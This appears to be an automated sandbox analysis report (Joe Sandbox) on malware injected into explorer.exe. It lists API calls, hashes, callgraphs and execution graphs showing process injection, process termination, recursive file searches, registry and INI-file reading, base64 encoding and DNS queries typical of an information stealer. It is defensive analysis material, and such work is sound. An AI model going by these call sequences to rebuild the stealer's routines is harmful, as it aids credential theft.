• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: _alldiv$_allmul
• String ID:
• API String ID: 4215241517-0
• Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction ID: 1a197f3663ff018c39212fb085b3681ddeabc8eca4a75208e10207dc5b516a6a
• Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction Fuzzy Hash: E921493351471D1FD7345E1ABED0B2B3598DB94391F24452DFC11C22E3E9638C4180A2
APIs
• _allmul.NTDLL(?,00000000,00000000), ref: 00A1B1B3
• _alldvrm.NTDLL(?,?,00000000), ref: 00A1B20F
• _allrem.NTDLL(?,00000000,?,?), ref: 00A1B28A
• memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00A1B298
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: _alldvrm_allmul_allremmemcpy
• String ID:
• API String ID: 1484705121-0
                                                                                                                                                      • Opcode ID: 944a35d3970c31694fb3e53e6b8623a892d57f10e00ff0735ed844553c2d97d3
                                                                                                                                                      • Instruction ID: a11024fb25f63d3819609ec94e1bd4f7f00232fcb9e303f4bf2d625421b7f204
                                                                                                                                                      • Opcode Fuzzy Hash: 944a35d3970c31694fb3e53e6b8623a892d57f10e00ff0735ed844553c2d97d3
                                                                                                                                                      • Instruction Fuzzy Hash: 8E4148716183019BC714EF25C9919AEBBE5BFD8340F04492DF98587262DB30EC89CB62
                                                                                                                                                      APIs
                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00A018A7
                                                                                                                                                      • GlobalLock.KERNEL32(00A04B57), ref: 00A018B6
                                                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 00A018F4
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00A018E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1688112647-0
                                                                                                                                                      • Opcode ID: 20f0cd96a9ea2f1f91df2d42505e15f58b4260dc7b17066da3e027a538b1efdf
                                                                                                                                                      • Instruction ID: fbd96e4c64e42b791e3c3e9839267819aa8e42432e48ae35ce1520b6feab8e41
                                                                                                                                                      • Opcode Fuzzy Hash: 20f0cd96a9ea2f1f91df2d42505e15f58b4260dc7b17066da3e027a538b1efdf
                                                                                                                                                      • Instruction Fuzzy Hash: 78014B7560030AAFCB019F69ED189DF7BA9BF94391B00852EF845832A1DF31C9159A60
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00A02F0C), ref: 00A01973
                                                                                                                                                      • lstrlenW.KERNEL32(00A56564,?,?,00A02F0C), ref: 00A01978
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?,?,?,00A02F0C), ref: 00A01990
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00A56564,?,?,00A02F0C), ref: 00A01994
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                      • Opcode ID: 6519bb6a8da0ce3774927c7151ef976020536d7f985a5b442dcf36622aaab225
                                                                                                                                                      • Instruction ID: 4a749f96feaf2b7a468995cd0fed9dbf70ffd8e30c4e965a30854196c50da9e3
                                                                                                                                                      • Opcode Fuzzy Hash: 6519bb6a8da0ce3774927c7151ef976020536d7f985a5b442dcf36622aaab225
                                                                                                                                                      • Instruction Fuzzy Hash: 78E0656230021C2B8714B7AE6C94EBB769CDAD97A57490039FA05D3242E9569C0546B0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A06A81: memset.NTDLL ref: 00A06A9C
                                                                                                                                                      • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 00A2F2A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _aulldivmemset
                                                                                                                                                      • String ID: %llu$%llu
                                                                                                                                                      • API String ID: 714058258-4283164361
                                                                                                                                                      • Opcode ID: 6219c90729fc087b6714cd4e73d77bdeea57e02272514e56cc9370194d4b187d
                                                                                                                                                      • Instruction ID: 6b040f3e6602f40809e2460cd92244707fe208960fdbeaac48a58b3c2ec2c612
                                                                                                                                                      • Opcode Fuzzy Hash: 6219c90729fc087b6714cd4e73d77bdeea57e02272514e56cc9370194d4b187d
                                                                                                                                                      • Instruction Fuzzy Hash: 2A21D771A44619ABC710AA24DD42E6B7768AF81730F054638F921976C1DB21EC25C7E1
                                                                                                                                                      APIs
                                                                                                                                                      • _allmul.NTDLL(?,00000000,?), ref: 00A12174
                                                                                                                                                      • _allmul.NTDLL(?,?,?,00000000), ref: 00A1220E
                                                                                                                                                      • _allmul.NTDLL(?,00000000,00000000,?), ref: 00A12241
                                                                                                                                                      • _allmul.NTDLL(00A02E26,00000000,?,?), ref: 00A12295
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _allmul
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4029198491-0
                                                                                                                                                      • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                      • Instruction ID: fa4a70ef6efbc9a85df499125bb219dced7721d2d7db0172cc24763788114dac
                                                                                                                                                      • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                                      • Instruction Fuzzy Hash: 8FA19B707087059FC714EF64CA91AAEB7E6AFD8704F00492DF6958B291EB70EC958B42
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                      • Opcode ID: a1a57c78eda1b93cd99c98a7b7300e16f4a30e668f8aa00f029a71a97e92ce0a
                                                                                                                                                      • Instruction ID: 81f62efd3d1c7582b440eb815d712af5d6a1c9cab8680e8294942f5dd1ee0f77
                                                                                                                                                      • Opcode Fuzzy Hash: a1a57c78eda1b93cd99c98a7b7300e16f4a30e668f8aa00f029a71a97e92ce0a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D818C7160C3149FC350DF28C980AAFBBF5EF88744F14592DF88A8B252E670E949CB91
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,00A02783), ref: 00A0192B
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00A02783), ref: 00A01930
                                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 00A01946
                                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00A0194A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                      • Opcode ID: cdabca4f2d6c69035ba19db063999e0c94d48cd4eec18a8cad3a93c51923e404
                                                                                                                                                      • Instruction ID: 7297345cd443184ebc31cb6831c7f063068320963e9a6632817eb76503cab50a
                                                                                                                                                      • Opcode Fuzzy Hash: cdabca4f2d6c69035ba19db063999e0c94d48cd4eec18a8cad3a93c51923e404
                                                                                                                                                      • Instruction Fuzzy Hash: B4E09B5230031C1B472177BE6C94DBB76DCDAD57E63450135FD05C3202ED559C0546B0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:21.7%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:181
                                                                                                                                                      Total number of Limit Nodes:17
                                                                                                                                                      execution_graph (rendered graph data not reproduced here): 181 nodes rooted at 9ba1f9 / 9ba298 (LoadLibraryA, VirtualProtect), 9b3608 (StrStrIW, RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegCloseKey, GetFileAttributesW, CreateFileW, CloseHandle, GetPrivateProfileSectionNamesW, GetPrivateProfileStringW, GetPrivateProfileIntW, FindFirstFileW, FindNextFileW, FindClose) and 9b37f4 (RegCreateKeyExW, RegCloseKey, CreateStreamOnHGlobal), with RtlFreeHeap called from the 9b1860 helper throughout.

                                                                                                                                                      Callgraph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                      • Disassembly available
                                                                                                                                                      callgraph (rendered graph data not reproduced here): 85 function nodes, Function_009B1000 through Function_009BB00C, with caller/callee edges; Function_009B1860 and Function_009B1838 are the most frequently referenced callees.

Control-flow Graph

• Executed
• Not Executed
control_flow_graph for function at 9b30a8 (rendered graph; basic-block edge list omitted)
APIs
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction ID: fca96132bd87536ada9bed21c6546bd3b7b5fb31c1c74e669ce4837aca476caa
• Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction Fuzzy Hash: E5417130318B4C5FDB94FB3899997EA73D6FBD8360F448A29A44AC3191EE78D9048781

Control-flow Graph

• Executed
• Not Executed
control_flow_graph for function at 9b38b0 (rendered graph; basic-block edge list omitted)
APIs
• NtUnmapViewOfSection.NTDLL ref: 009B38F2
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction ID: 7542fa57ab46ecc146ba10bd667b9bebf3ca7f93d01104b451d23688b60a558a
• Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction Fuzzy Hash: 58F0E520F11A081BEF6CB7BD6A9D3B83284EB98320F908629B515C32D2DC398E458302

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE ref: 009B27C7
• RegQueryValueExW.KERNELBASE ref: 009B27F4
• RegQueryValueExW.KERNELBASE ref: 009B283A
• RegCloseKey.KERNELBASE ref: 009B2860
  • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: QueryValue$CloseFreeHeapOpen
• String ID:
• API String ID: 1641618270-0
• Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction ID: 501fc25825a740ab3f1afd8e7ad29df6d8839325ee35a73623671ebbef37940e
• Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction Fuzzy Hash: 5131A73020CB488FE769DB28D5987BA77E4FBE8365F54062EE48AC2264DF34C8458742

Control-flow Graph

• Executed
• Not Executed
control_flow_graph for function at 9b372c (rendered graph; basic-block edge list omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: CloseCreate
• String ID: ?
• API String ID: 2932200918-1684325040
• Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction ID: f309e7cde775adf2fc27b618b1afd52fa00962e147f99e2f61acc50d4bcb11ca
• Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction Fuzzy Hash: 97116070618B488FD751DF69D48866AB7E1FBD8355F50062EE48AC3260DF389985CB82

Control-flow Graph

• Executed
• Not Executed
control_flow_graph for function at 9ba298 (rendered graph; basic-block edge list omitted)
APIs
• LoadLibraryA.KERNELBASE ref: 009BA397
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 009BA441
• VirtualProtect.KERNELBASE ref: 009BA45F
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B9000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b9000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction ID: 9847ab5aedea81ed1308852c92ee1579379ff2164f83acb1e7bab67bc7e4fc6f
• Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction Fuzzy Hash: 28517A32758D1E4BDB24AB7C9DC47F5B3D1F769331B580A2BC49AC3284EA59D8468383

Control-flow Graph

• Executed
• Not Executed
control_flow_graph for function at 9b3254 (rendered graph; basic-block edge list omitted)
APIs
  • Part of subcall function 009B298C: GetFileAttributesW.KERNELBASE ref: 009B299E
• GetPrivateProfileSectionNamesW.KERNEL32 ref: 009B330F
• GetPrivateProfileStringW.KERNEL32 ref: 009B336F
• GetPrivateProfileIntW.KERNEL32 ref: 009B338C
  • Part of subcall function 009B30A8: FindFirstFileW.KERNELBASE ref: 009B3104
  • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
• String ID:
• API String ID: 970345848-0
• Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction ID: 35c6773c9559f86e2272b7898d7c138b873e91d9e4063f01e67173abe3e284e8
• Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction Fuzzy Hash: BC51C830728F094BDB19FB2C99567B933D2FBD8720B84456EE40AC3296EE64DD458386

Control-flow Graph

APIs
• StrStrIW.KERNELBASE ref: 009B347E
• RegOpenKeyExW.KERNELBASE ref: 009B353F
• RegEnumKeyExW.KERNELBASE ref: 009B35D6
  • Part of subcall function 009B2774: RegOpenKeyExW.KERNELBASE ref: 009B27C7
  • Part of subcall function 009B2774: RegQueryValueExW.KERNELBASE ref: 009B27F4
  • Part of subcall function 009B2774: RegQueryValueExW.KERNELBASE ref: 009B283A
  • Part of subcall function 009B2774: RegCloseKey.KERNELBASE ref: 009B2860
  • Part of subcall function 009B3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 009B330F
  • Part of subcall function 009B1860: RtlFreeHeap.NTDLL ref: 009B1880
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
• String ID:
• API String ID: 1841478724-0
• Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction ID: df9412db0b71f3a060d4fc7b1871d3f609c0198478b76556d8462bbad46f8eff
• Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction Fuzzy Hash: 20416C30718B0C4FDBA8EF6D95997AAB6E6FBD8350F40456EA14EC3261DE34D9048742

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
control_flow_graph 232 9b2938-9b2943 233 9b2945-9b2948 232->233 234 9b2984 232->234 233->234 236 9b294a-9b2970 CreateFileW 233->236 235 9b2986-9b298b 234->235 237 9b2972-9b297a CloseHandle 236->237 238 9b2980-9b2982 236->238 237->238 238->235
APIs
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
• Instruction ID: 2aa9de96a5121576605e0d446675fac32c81edba412f56cabfaf33846e470071
• Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
• Instruction Fuzzy Hash: ADF02B7021570A4FE7446FB84698376B5D4FB083A5F18473DE45EC62D0D73888428702

Control-flow Graph
control_flow_graph 251 9b22b4-9b22c6 252 9b22c8-9b22d0 CreateStreamOnHGlobal 251->252 253 9b22d6-9b22e6 251->253 252->253
APIs
• CreateStreamOnHGlobal.COMBASE ref: 009B22D0
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
• Instruction ID: c656f4108ff02d332105a31c43a7bc61f3031b77bc2b05dc5b024a551162fddb
• Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
• Instruction Fuzzy Hash: 60E0C230108B0A8FD758AFBCE5CA07933A1FB9C252B05053FE005CB114D27988C1C741

Control-flow Graph
control_flow_graph 254 9b298c-9b2997 255 9b2999-9b299c 254->255 256 9b29b5 254->256 255->256 257 9b299e-9b29a7 GetFileAttributesW 255->257 258 9b29b7-9b29bc 256->258 259 9b29a9-9b29af 257->259 260 9b29b1-9b29b3 257->260 259->260 260->258
APIs
• GetFileAttributesW.KERNELBASE ref: 009B299E
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
• Instruction ID: 1faae466902d2459315a0ff39b01283ea8243981ca092cc74b3535d9d82b6b64
• Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
• Instruction Fuzzy Hash: 7AD0A722722905077B6427F90BDD2F130A8D71933AF14033AEB3EC11E0E289CCD5A201

Control-flow Graph
control_flow_graph 261 9b1860-9b1870 call 9b1ad4 264 9b1872-9b1880 RtlFreeHeap 261->264 265 9b1886-9b188b 261->265 264->265
APIs
Memory Dump Source
• Source File: 00000010.00000002.1730528673.00000000009B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_9b1000_explorer.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
• Instruction ID: 058a5bbd5390813f1975c0ddb5d9a49b65c9572dd7f1bdd0aa37cd09d70504a4
• Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
• Instruction Fuzzy Hash: 08D01224716A040BEF2CBBFA1D9D2B47AD6E798222B588065B819C3251DD39D895C341

Execution Graph

Execution Coverage: 14.4%
Dynamic/Decrypted Code Coverage: 96.2%
Signature Coverage: 3.8%
Total number of Nodes: 212
Total number of Limit Nodes: 2
execution_graph 673 801000 674 801010 673->674 675 801007 673->675 677 801016 675->677 685 8027e2 VirtualQuery 677->685 680 801022 680->674 682 80102e RtlMoveMemory NtUnmapViewOfSection 688 80104f 682->688 686 80101e 685->686 686->680 687 8029b7 GetProcessHeap RtlAllocateHeap 686->687 687->682 727 8029b7 GetProcessHeap RtlAllocateHeap 688->727 690 80105c 728 8029b7 GetProcessHeap RtlAllocateHeap 690->728 692 80106b ExpandEnvironmentStringsW 693 801085 692->693 694 80108c ExpandEnvironmentStringsW 692->694 729 80123a 693->729 696 8010a0 ExpandEnvironmentStringsW 694->696 697 801099 694->697 699 8010b4 SHGetSpecialFolderPathW 696->699 700 8010ad 696->700 698 80123a 24 API calls 697->698 698->696 702 8010c5 699->702 703 8010cc ExpandEnvironmentStringsW 699->703 701 80123a 24 API calls 700->701 701->699 704 80123a 24 API calls 702->704 705 8010e0 ExpandEnvironmentStringsW 703->705 706 8010d9 703->706 704->703 708 8010f4 ExpandEnvironmentStringsW 705->708 709 8010ed 705->709 736 8011cc 706->736 711 801101 708->711 712 801108 ExpandEnvironmentStringsW 708->712 751 801192 709->751 713 801192 16 API calls 711->713 714 801115 712->714 715 80111c ExpandEnvironmentStringsW 712->715 713->712 718 801192 16 API calls 714->718 716 801130 715->716 717 801129 715->717 758 802999 716->758 719 801192 16 API calls 717->719 718->715 719->716 722 801187 ExitProcess 724 80114e 725 80117f 724->725 726 801158 wsprintfA 724->726 725->722 726->725 726->726 727->690 728->692 764 80274a CreateToolhelp32Snapshot 729->764 734 80255c 16 API calls 735 801268 734->735 735->694 737 80255c 16 API calls 736->737 738 8011e6 737->738 739 80255c 16 API calls 738->739 740 8011f3 739->740 741 80255c 16 API calls 740->741 742 801200 741->742 743 80255c 16 API calls 742->743 744 80120d 743->744 745 80255c 16 API calls 744->745 746 80121a 745->746 747 80255c 16 API calls 746->747 748 801227 747->748 749 80255c 16 API calls 748->749 750 801234 749->750 750->705 752 80255c 16 API calls 751->752 753 8011ac 752->753 754 80255c 16 API calls 753->754 755 8011b9 754->755 756 80255c 16 API calls 755->756 757 8011c6 756->757 757->708 759 8027e2 VirtualQuery 758->759 760 8029a1 759->760 761 801137 760->761 762 8029a5 GetProcessHeap HeapFree 760->762 761->722 763 8029b7 GetProcessHeap RtlAllocateHeap 761->763 762->761 763->724 765 802765 Process32First 764->765 766 801249 764->766 767 8027ae 765->767 773 80255c 766->773 768 8027b2 CloseHandle 767->768 769 80277f lstrcmpiA 767->769 768->766 770 8027a0 Process32Next 769->770 771 802795 769->771 770->767 788 8027be OpenProcess 771->788 791 8029b7 GetProcessHeap RtlAllocateHeap 773->791 775 80257a lstrcatW PathAppendW 776 8025a2 FindFirstFileW 775->776 777 80265d 775->777 776->777 778 8025b9 776->778 779 802999 3 API calls 777->779 780 8025bd RtlZeroMemory 778->780 782 80263e FindNextFileW 778->782 783 80260f lstrcatW PathAppendW 778->783 786 8025df lstrcatW PathAppendW 778->786 787 80255c 5 API calls 778->787 781 80125b 779->781 780->778 781->734 782->780 785 802652 FindClose 782->785 783->782 784 802627 StrStrIW 783->784 784->778 784->782 785->777 786->778 786->782 787->778 789 8027e0 788->789 790 8027d0 TerminateProcess CloseHandle 788->790 789->770 790->789 791->775 826 802013 827 802036 826->827 828 802029 lstrlen 826->828 837 8029b7 GetProcessHeap RtlAllocateHeap 827->837 828->827 830 80203e lstrcat 831 802073 lstrcat 830->831 832 80207a 830->832 831->832 838 8020a7 832->838 835 802999 3 API calls 836 80209d 835->836 837->830 872 802415 838->872 842 8020d4 877 802938 lstrlen MultiByteToWideChar 842->877 844 8020e3 878 8024cc RtlZeroMemory 844->878 847 802135 RtlZeroMemory 849 80216a 847->849 848 802999 3 API calls 850 80208a 848->850 853 8023f7 849->853 855 802198 849->855 880 80243d 849->880 850->835 852 8023dd 852->853 854 802999 3 API calls 852->854 853->848 854->853 855->852 889 8029b7 GetProcessHeap RtlAllocateHeap 855->889 857 802268 wsprintfW 858 80228e 857->858 862 8022fb 858->862 890 8029b7 GetProcessHeap RtlAllocateHeap 858->890 860 8022c8 wsprintfW 860->862 861 8023ba 863 802999 3 API calls 861->863 862->861 891 8029b7 GetProcessHeap RtlAllocateHeap 862->891 865 8023ce 863->865 865->852 866 802999 3 API calls 865->866 866->852 867 8023b3 870 802999 3 API calls 867->870 868 802346 868->867 892 80296b VirtualAlloc 868->892 870->861 871 8023a0 RtlMoveMemory 871->867 873 80241f 872->873 875 8020c6 872->875 893 802818 lstrlen lstrlen 873->893 876 8029b7 GetProcessHeap RtlAllocateHeap 875->876 876->842 877->844 879 8020f3 878->879 879->847 879->853 882 80244a 880->882 883 8024ab 880->883 881 80244e DnsQuery_W 881->882 882->881 882->883 884 80248d DnsFree inet_ntoa 882->884 883->855 884->882 885 8024ad 884->885 895 8029b7 GetProcessHeap RtlAllocateHeap 885->895 887 8024b7 896 802938 lstrlen MultiByteToWideChar 887->896 889->857 890->860 891->868 892->871 894 802839 893->894 894->875 895->887 896->883 792 809d24 794 809caf 792->794 793 809f00 VirtualProtect VirtualProtect 795 809ec9 793->795 794->793 794->795 811 8018f4 CreateFileW 812 801919 GetFileSize 811->812 813 80196d 811->813 814 801965 CloseHandle 812->814 815 801929 812->815 814->813 815->814 821 8029b7 GetProcessHeap RtlAllocateHeap 815->821 817 801936 ReadFile 820 80194b 817->820 818 802999 3 API calls 819 801964 818->819 819->814 820->818 821->817 915 801e44 916 801e5b lstrlen CharLowerBuffA 915->916 923 801eb3 915->923 917 801e75 916->917 918 801e9d 916->918 917->918 919 801e7f lstrcmpiA 917->919 922 801ece 8 API calls 918->922 918->923 919->917 919->923 920 8026a9 921 802692 lstrlen RtlMoveMemory 921->920 922->923 923->920 923->921 822 809cf6 824 809caf 822->824 823 809f00 VirtualProtect VirtualProtect 825 809ec9 823->825 824->822 824->823 824->825 897 802917 lstrlenW WideCharToMultiByte 804 8026ac lstrlen 805 8026f3 804->805 806 8026c4 CryptBinaryToStringA 804->806 806->805 807 8026d7 806->807 810 8029b7 GetProcessHeap RtlAllocateHeap 807->810 809 8026e2 CryptBinaryToStringA 809->805 810->809 924 80295c VirtualFree 898 801e3e 899 801e5b lstrlen CharLowerBuffA 898->899 902 801eb3 898->902 903 801e75 899->903 905 801e9d 899->905 900 801e7f lstrcmpiA 900->902 900->903 901 8026a9 902->901 904 802692 lstrlen RtlMoveMemory 902->904 903->900 903->905 904->901 905->902 907 801ece StrStrIA 905->907 908 801ef5 RtlMoveMemory RtlMoveMemory StrStrIA 907->908 909 801eee 907->909 